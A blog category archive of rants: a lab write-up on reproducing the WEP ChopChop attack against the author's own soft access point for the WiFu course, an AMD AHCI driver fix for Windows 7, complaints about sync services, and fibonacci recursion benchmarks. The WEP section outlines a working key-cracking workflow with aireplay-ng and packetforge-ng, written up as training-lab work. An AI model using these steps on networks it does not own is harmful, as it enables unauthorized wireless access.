Category Archives: Rant

Reproducing KoreK’s ChopChop attack is a pain in the ass

Well, getting a Netgear WNR1000v2, one of the recommended access points by WiFu, was also a pain in the ass since the product is EOL. Imagine my surprise when I couldn’t reproduce this particular attack as the AP was not dropping properly the packets with invalid ICV.

I started to dig for some information. The product that I got was so old that basically was one of those unsold units. It came with the only firmware still available on Netgear’s support site that features WEP support. Actually, the only one who mentions this product in relation to WiFu is Samiux. WNR1000v2h2 is basically a WNR1000v2, but with internal antenna.

The things that I tried, but utterly failed

I tried the Netgear WNR1000v2 AP with firmware versions 1.0.1.1 (the version that was installed on it), 1.0.1.1NA (basically the same as previous, but region locked to USA, so it would stick to FCC’s emission regulations), and 1.1.2.28 (does not feature WEP support).

I dug up my retired ASUS WL-500g Premium. Tried the attack with the following firmwares: OpenWrt 12.09 (built the attitude_adjustment branch myself few months ago due to unstable b43 driver at the time of the 12.09 release), OpenWrt 10.03 brcm-2.4 (Linux 2.4.40, Broadcom STA / wl driver), and the first available factory firmware on ASUS’ support site, v1.9.6.9. Neither of them worked. OpenWrt 12.09 and the factory firmware created the illusion that it works, only to fail few seconds later.

I also tried to create a basic soft AP using hostapd. In reality, not all the drivers and hardware are the same. While it theoretically supports the nl80211 library in order to talk to devices that use mac80211 drivers, only some of the chips that support master mode can actual create a working AP.

My first try was a proof of concept on a piece of Raspberry Pi, but it didn’t work as I was using my portable stuff instead of the toys that stay at home in my proper Wi-Fi lab. I tried to create an AP using Unex DNUA-93F, powered by AR9271, but I had nothing to test it with. While Kali works on VirtualBox / OS X, the USB support is spotty at best and this card is the only one that can be used with a certain degree of reliability. So I had to switch to an ALFA AWUS051NH, powered by RT2770. I could get reliable packet injection starting from a fragmentation attack, but no dice with ChopChop.

In my home lab I tried to create a proper soft AP on a machine which runs Kali, but as previously mentioned, not all the hardware is the same. I tried to create an AP with the legendary ALFA AWUS036H, powered by RTL8187. For some reason, hostapd won’t start with this card if WEP is in use. Running hostapd with -dd added more confusion, hence I switched to the built in wireless interface, an AirForce One 54g, powered by BCM4318. The AP was created successfully, but every connected client wouldn’t finish the authentication and the log was flooded with “wlan0: STA […] did not acknowledge authentication response”. Which was odd as WL-500gP has the same Mini PCI card in it.

What finally worked

I created a soft AP using a TP-LINK TL-WN722N, powered by AR9271 (same as Unex DNUA-93F). For the internet connectivity I used the built in AirForce One 54g to connect to my actual AP.

For the configuration I used the information posted by nims11’s article about how to create a soft AP, but I used dnsmasq as DHCP server because dhcpd was being a pain in the ass (you can see a pattern here).

The hostapd config in /etc/hostapd/hostapd.conf:

interface=wlan2
driver=nl80211
ssid=wifu
hw_mode=g
channel=3
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wep_default_key=0
wep_key0=AABBCCDDEE

The dnsmasq config in /etc/dnsmasq.conf:

# disables dnsmasq reading any other files like /etc/resolv.conf
no-resolv
# Interface to bind to
interface=wlan2
# Specify starting_range,end_range,lease_time
dhcp-range=10.0.0.3,10.0.0.20,12h
# dns addresses to send to the clients
server=8.8.8.8
server=8.8.4.4

The initSoftAP for starting up the stuff:

#!/bin/bash
#Initial wifi interface configuration
ifconfig $1 up 10.0.0.1 netmask 255.255.255.0
sleep 2
 
###########Start dnsmasq, modify if required##########
if [ -z "$(ps -e | grep dnsmasq)" ]
then
 dnsmasq
fi
###########
 
#Enable NAT
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $2 -j MASQUERADE
iptables --append FORWARD --in-interface $1 -j ACCEPT
 
sysctl -w net.ipv4.ip_forward=1
 
#start hostapd
hostapd /etc/hostapd/hostapd.conf
killall dnsmasq

Started it with ./initSoftAp wlan2 wlan0 (under root, obviously). I did the double-NAT over Wi-Fi because I was too lazy to add another patch cable over the already crowded desktop. Otherwise, it would be ./initSoftAp wlan2 eth0.

I booted up my desktop machine, started Kali in a VirtualBox VM, and made the ALFA AWUS036H to be available inside the VM. Did the usual drill (airmon-ng, airodump-ng, etc). I had to keep the antennas about 1.5 meters apart due to their radiation pattern.

I used my phone as testing client. I could browse the ‘net and I got the 10.0.0.3 IP via DHCP, as instructed by dnsmasq. The ChopChop attack was running in unauthenticated mode, but the packets fetched from the phone as client were not usable. In fact, I don’t recall getting usable packets in unauthenticated mode.

I fired up another instance of aireplay-ng running fake auth and retried the ChopChop attack in authenticated mode. The first captured packet was a winner. Bam! I got the plaintext capture and the PRGA / xor file. Few minutes later, after creating an ARP packet with packetforge-ng and injecting it via interactive packet injection, I managed to crack the WEP key, therefore successfully completing the ChopChop challenge.

The end

It took me two long days, but I did learn a lot. I think the WiFu lab can be reduced to my desktop machine, running a couple of VirtualBox VMs (one for Kali, one for a soft AP), two Wi-Fi USB adapters, and a wireless client to play the victim role. This can be either a phone, a tablet, a notebook (this may be the host machine for VirtualBox and the victim), or another VM plus another USB adapter. I think hunting for old hardware for this course is a flawed idea. Sure, ALFA AWUS036H may be used after finishing this course, but the AP is going to be virtually useless.

Fixing the AMD AHCI drivers for SB7xx on Windows 7

I heard a lot of urban legends about the Windows Update service that messes up your machine. Of course, I dismissed all of them with the classic “worksforme” as didn’t happen to me. Until Microsoft delivered a 3rd party driver update via an optional package. You know, like the stuff that comes from the vendor and it isn’t properly tested. I had the lack of inspiration to check that too instead of simply ignoring it, like I usually do with Bing Desktop and Silverlight. The next thing was a BSOD at boot.

Had to disable the AHCI in BIOS and revert to using IDE mode for the SATA ports. Which kinda sucks for some reasons. The most important: the SSD performance is hurt under IDE mode, the TRIM command won’t work under IDE mode without 3rd party software since only the MSAHCI driver implements TRIM from Windows 7, and the fact that my HDD array doesn’t support NCQ under IDE mode.

When it comes to drivers, AMD is still a shitty company. Even more, their engineers didn’t grasp the concept of backward compatibility. Uninstalling the driver that broke my installation and installing a driver that works proved to be a non-trivial task. Fortunately I found this post on pchelpforum.com.

For the sake of avoiding the link rot, I’m going to reproduce the essentials for posterity, with the same disclaimer as the original – you’re on your own if you mess up your machine and I’m not taking any responsibility if you follow these:

  • Delete any older version of the amd_ahci driver from here: C:\Windows\System32\DriverStore\FileRepository. The folders with older AMD AHCI drivers are named something like: amd_sata.inf_amd64_neutral_c85cc6046149a413 (i386 on 32-bit and most probably another hash). In order to remove the directory, you need to either elevate your explorer / shell to SYSTEM privileges, or take the ownership of the driver directory, add proper permissions, then delete it.
  • From HKLM/SYSTEM/CurrentControlSet/services delete amd_sata and amd_xsata. There’s no need to remove the entries without the underscore (amdsata and amdxsata).
  • Reboot the computer. Don’t change from IDE to AHCI. The driver that actually worked for my combination, which is AMD 780G / SB700 is this one. Execute the installer, wait till it finishes to copy the files to C:\ATI\Support, then cancel the setup when the Catalyst installer starts.
  • Open the Device Manager. Action » Add legacy hardware » Advanced mode » Show All Devices » Have Disk. Browse the extraction path for the above package: C:\ATI\Support\11-12_vista32-64_ahci\Packages\Drivers\SBDrv\SB7xx\AHCI. There’s a couple of directories: LH – for 32-bit and LH64A – for 64-bit. Select “AMD SATA Controller” then continue. Unlike the author of the original material, I didn’t get an error about the device not starting.
  • Reboot the computer. Don’t change from IDE to AHCI. Go to Device Manager. Under IDE ATA/ATAPI controllers should be at least an entry with a yellow exclamation mark, AMD SATA Controller. Uninstall “AMD SATA Controller” without checking “Delete the driver software for this device”. Reboot the machine.
  • Go to BIOS, enable AHCI. After boot, the OS installs the proper drivers, then prompts for another reboot. Reboot the machine. Done.

In my case, it simply fixed the driver installation from the failed Windows update as the driver that runs on my machine is from 2013 and the driver used in the above steps is from 2011. The drivers from the latest Catalyst, 13.4 failed to install via the “Add legacy hardware” method or via a standard Catalyst setup.

amd-sata-controller

Some benchmarks with a SSD drive under IDE mode:

benchmark1-idebenchmark2-ide

And some benchmarks under AHCI mode:

benchmark1-ahcibenchmark2-ahci

I guess the sharp drop was due to TRIM doing its job. Yes, it’s enabled:

trim

Doing what Dropbox is doing and doing it wrong

Let’s take a couple of examples. Switched from an older machine recently, therefore I need to setup all my stuff. As I don’t like to depend on a single service, for redundancy’s sake, I also keep a backup for Dropbox.

SpiderOak – backs up stuff, uses client side encryption, has optional sync between your machines. So far, so good. In the latest OS X client, at least, the possibility to paste the password is missing. Thanks, I’ll me use my password manager instead with services that don’t do such a braindead thing. Seriously, there’s a thing that improves the security of the password authentication. It is called two factor authentication. Dropbox has it. Google has it. In fact, any decent service has it. Disabling the possibility to paste the password, not so much.

Google Drive – you wouldn’t think I’m letting Google of the hook this time. As I don’t trust with my data these sync services, I always do client side encryption. Dropbox doesn’t choke on it, SpiderOak doesn’t choke on it. Google Drive must be a special kind of breed as it chokes on my encrypted files with “Upload Error – An unknown issue has occurred “. Gee, let me fix the error message for you: “your piece of shit encrypted files aren’t of any use for us, there’s no personal info there”. Was it that difficult? Thanks, but the market is full of alternatives. Seriously Google, you could do better than this “not being evil” thing.

Will it recur? Part 2: in depth analysis

The social experiment

This first chapter is not about recursion. One member of the community wrote that certain inflammatory statements that I use may upset people. I replied with: “buzz marketing”. Neutral articles, with neutral titles, written by nobodies like me, gain zero traction, although I may write something that’s technically sound. Cheap journalism has more success. I even have graphs to prove it now.

The second stuff is the usefulness of my little experiment. I don’t know about others, but the curiosity was the main thing behind my whole benchmark. If it isn’t useful for some people, it doesn’t mean that it isn’t useful for others.

The other thing: the lack of tail recursion. I mean, do you need a “DUH” award, or something? The whole point of a “bad” algorithm that’s mathematically correct (well, almost, I stated that fibonacci(0) is wrong) is to prove how smart are specific compilers regarding recursion. The rest, simply do brute force.

Patterns that emerge

The numbers say something if you know how to read the page. There are runtimes that are optimized for doing proper recursion without bothering the programmer with it: C, D, PyPy, V8, LuaJIT, JVM. The rest aren’t: PHP, CPython, Ruby, Perl, Lua. PyPy and V8 could do better. LuaJIT is already close to the speed of unoptimized C and D. V8 isn’t the king of the hill if you take Ruby (MRI / KRI), CPython, plain Lua VM, and PHP (Zend Engine) out of the equation. This may be another opportunity to get bashed by the node.js benchmark police with “this is irrelevant” statements, although this wasn’t something that I wanted to prove.

Thing is, that for most of the web development, I rarely needed to actually solve purely recursive problems. At most a fairly simple tree. Sometimes even that simple tree didn’t actually require recursion. Therefore I get why some don’t optimize for this specific case, although they refer the thing as being “a general purpose language”.

For the “write better algorithms” crowd … WHY? The difference between C’s 0.6 seconds and Ruby’s 5 minutes doesn’t ring any bell that some things are fundamentally flawed regarding recursion?

As for the edge cases, there are 3rd party libraries that solve this issue without bothering the programmer. Or for other edge cases, such as applications that do complicated stuff, operating at Google-like scale, there are better tools that most mere mortals won’t use. The fact that some implementation do poor recursion is indeed irrelevant when the problems you’re trying to solve don’t include this.

In the end

Initially I wanted to try more stuff such as factorial, Euclid’s GCD, or the Ackermann function, for example. Try them on runtimes that don’t take longer than the next ice age to return a value. But why bother, except maybe to give the “one true way of doing recursion in functional languages” programmers a reason to bash stuff without returning any useful output. Not even an academic paper. It’s not productive.

But the question is: will it recur? Part 1: fibonacci(40)

A rant, maybe a bad rant due to babbling about philosophical reasons, made me wonder how the programming languages stack up against this stuff: recursion. Or should I say the runtimes, since the programming language itself is nothing but a bunch of text. I know that the algorithm itself is bad, but that’s the whole point. I know that fibonacci(0) yields a wrong result, but for the sake of lazyness, I kept the original algorithm.

The source code of all the tests is available here in order to make the tests to be reproducible. There wasn’t a high number of runs, particularly for the rutimes that take more than the next ice age. But the results are pretty consistent for specific runtimes. The relevant systems specs are: Ubuntu 10.04 amd64 (up to date), Q9400 CPU.

Now, less talk, more results.

JavaScript (node.js/V8)

node -v: v0.4.12
time node fib.js
node fib.js 6.40s user 0.02s system 99% cpu 6.423 total
node fib.js 6.39s user 0.02s system 99% cpu 6.410 total

It may seem slow, but for a language with dynamic typing, it puts the rest from the same category to shame. Or most of them. Bear with me.

PHP

php -v: PHP 5.3.8 (cli)
time php fib.php
php fib.php 77.57s user 0.06s system 99% cpu 1:17.66 total
php fib.php 78.05s user 0.07s system 99% cpu 1:18.18 total

Compared to the V8 runtime, PHP seems to take an eternity. It happens that PHP isn’t bad at recursion because it uses the stack, but because the lack of speed of the runtime. But we’re not even halfway there. Stay tuned. PHP isn’t the only thing that sucks at recursion.

C

gcc -v: gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5)
make fib
time ./fib
./fib 2.84s user 0.00s system 100% cpu 2.840 total
./fib 2.84s user 0.00s system 100% cpu 2.835 total

It wasn’t a surprise that C came up to this result. Which makes the V8 result even more interesting.

Edit:
Forgot about the compiler optimization. Caught by Jabbles on HN.

gcc -O4 fib.c -o fib
time ./fib
./fib 0.65s user 0.01s system 100% cpu 0.657 total
gcc -O3 fib.c -o fib
time ./fib
./fib 0.66s user 0.00s system 100% cpu 0.657 total
gcc -O2 fib.c -o fib
time ./fib
./fib 1.54s user 0.00s system 100% cpu 1.535 total
gcc -O1 fib.c -o fib
time ./fib
./fib 0.00s user 0.00s system 0% cpu 0.001 total
time ./fib
165580141
./fib 2.06s user 0.00s system 99% cpu 2.060 total

For some reason, the O1 flag hates this code. Printing fibonacci(40) yields a result closer to the result without any O flag. This brings it past the Java result, but only for O3+.
/End Edit.

Lua

lua -v: Lua 5.1.4
time lua fib.lua
lua fib.lua 28.02s user 0.03s system 99% cpu 28.081 total
lua fib.lua 28.86s user 0.02s system 99% cpu 28.883 total

./luajit -v: LuaJIT 2.0.0-beta8
time ./luajit fib.lua
./luajit fib.lua 10.59s user 0.00s system 99% cpu 10.591 total
./luajit fib.lua 10.58s user 0.01s system 99% cpu 10.610 total

Tested both of the implementations that I know of. I guess this article isn’t that funny for the generations of Lua coders that laugh about V8 in somebody’s face. Don’t get me wrong, I like Lua due to its simplicity, but in the speed realm, I still need to do some tests to verify some of those claims that sometimes appear to be overly inflated.

Edit:

With the following Lua script:

local function fibonacci(n)
	if n < 2 then
		return 1
	else
		return fibonacci(n - 2) + fibonacci(n - 1)
	end
end
fibonacci(40)

the results are getting better:

time lua fib.lua
lua fib.lua 24.17s user 0.08s system 99% cpu 24.281 total
lua fib.lua 24.24s user 0.01s system 99% cpu 24.307 total

[with LuaJIT v2.0.0-beta8 GIT HEAD]
time ./luajit fib.lua
./luajit fib.lua 2.02s user 0.00s system 99% cpu 2.026 total
./luajit fib.lua 2.02s user 0.00s system 99% cpu 2.023 total

Now, some of the Lua chops can have a lulz about V8. This project is getting more interesting, especially for pairing LuaJIT with luafcgid. I forgot about the local keyword since my Lua experience is limited to basic testing. Nice comeback!

/End Edit.

Python

python -V: Python 2.6.5
time python fib.py
python fib.py 59.42s user 0.02s system 99% cpu 59.494 total
python fib.py 59.27s user 0.05s system 99% cpu 59.375 total

./configure
make -j 4
./python -V: Python 2.7.2
time ./python fib.py
./python fib.py 61.29s user 0.03s system 99% cpu 1:01.35 total
./python fib.py 61.38s user 0.06s system 99% cpu 1:01.48 total

./configure
make -j 4
./python -V: Python 3.2.2
./python fib.py 71.23s user 0.08s system 99% cpu 1:11.33 total
./python fib.py 70.31s user 0.06s system 99% cpu 1:10.39 total

./pypy -V
Python 2.7.1 (d8ac7d23d3ec, Aug 17 2011, 11:51:19)
[PyPy 1.6.0 with GCC 4.4.3]
./pypy fib.py 4.61s user 0.07s system 99% cpu 4.708 total
./pypy fib.py 4.81s user 0.01s system 99% cpu 4.853 total

Happens to have 2.6.5 around because Ubuntu says so. But in order to make the potential trolls to STFU about not using the latest versions, I made some fresh builds of 2.7.2 and 3.2.2. It gets even suckier with recent versions. In fact, the CPython runtime is struggling to catch up the PHP runtime on the slowness realm. The only Python runtime that is actually very impressive about the recursion stuff is PyPy. Which brings me to the first statement: the language is just a bunch of text. The runtime is the piece that sucks or does not suck. PyPy proves that with talented people shepherding the project, the language of the runtime implementation is quite irrelevant. This is the first implementation of a JIT that passes V8 as well.

Ruby

ruby -v: ruby 1.8.7 (2010-01-10 patchlevel 249) [x86_64-linux]
time ruby fib.rb
ruby fib.rb 233.40s user 66.94s system 99% cpu 5:00.55 total
ruby fib.rb 231.75s user 68.08s system 99% cpu 4:59.99 total

./configure
make -j 4
./miniruby -v: ruby 1.9.3dev (2011-09-23 revision 33323) [x86_64-linux]
time ./miniruby fib.rb
./miniruby fib.rb 36.05s user 0.01s system 99% cpu 36.073 total
./miniruby fib.rb 35.92s user 0.04s system 99% cpu 35.978 total

Everytime a Ruby fan says that “thou shalt not care about the runtime speed” makes me laugh so hard up to the point of bursting into tears. Seriously, I couldn’t imagine that MRI sucks that hard at recursion. I barely had the patience to even run this code. KRI washes part of the shame though while it scores closely to the Lua implementation. If you’re asking why I used the miniruby binary, the reason is that the ruby binary complained about not having rubygems.rb. I am bad at figuring out what’s missing from a Ruby stack. But it made the fib.rb work.

Perl

perl -v: This is perl, v5.10.1 (*) built for x86_64-linux-gnu-thread-multi
time perl fib.pl
perl fib.pl 125.60s user 0.17s system 99% cpu 2:05.92 total
perl fib.pl 124.06s user 0.10s system 99% cpu 2:04.20 total

./Configure [accepted all defaults, specifically built without threading]
make
./perl -v: This is perl 5, version 14, subversion 2 (v5.14.2) built for x86_64-linux
./perl fib.pl 100.12s user 0.09s system 99% cpu 1:40.29 total
./perl fib.pl 100.38s user 0.05s system 99% cpu 1:40.63 total

At first I didn’t want to bother with Perl, but then I remembered the legions of Perl fans ranting about the PHP recursion. I know that this is an inflammatory statement, but next time, people, please keep up with the facts. I guess you aren’t that smug now.

D

gdc -v: gcc version 4.3.4 (Ubuntu 1:1.046-4.3.4-3ubuntu1)
gdc -o fib fib.c (same source as the C binary)
time ./fib
./fib 2.82s user 0.00s system 100% cpu 2.817 total
./fib 2.82s user 0.00s system 100% cpu 2.814 total

Predictable results from a language from the same family as C/C++. Slightly faster binary that the C version (although the same source code), but I guess most people won’t notice.

Java

javac -version: gcj-4.4 (Ubuntu 4.4.3-1ubuntu4.1) 4.4.3
java -version
java version “1.6.0_20”
OpenJDK Runtime Environment (IcedTea6 1.9.9) (6b20-1.9.9-0ubuntu1~10.04.2)
OpenJDK 64-Bit Server VM (build 19.0-b09, mixed mode)
javac fib.java
time java fib
java fib 0.86s user 0.02s system 99% cpu 0.882 total
java fib 0.86s user 0.02s system 100% cpu 0.872 total

I admit that sometimes I use to tell this joke: knock! knock!; who’s there?; [very long pause]; Java. I guess that now is a good time to swallow my own words. Not only that Java puts the other JIT implementations to shame, the rest of the VMs to shame, it also obliterates the statically compiled C and D binaries at their own favorite game aka the runtime speed. My first reaction was: WTF, there’s got to be a mistake! Printing some junk to STDIO confirmed the same results between C and Java. Newbie warning: this is my first Java application. No, really! Don’t bash me for the lack of understanding of the usage of the static keyword. I don’t understand if it actually helps the runtime. I managed to put together the code by reading how to write a simple HelloWorldApp. Experienced Java chops may explain it though.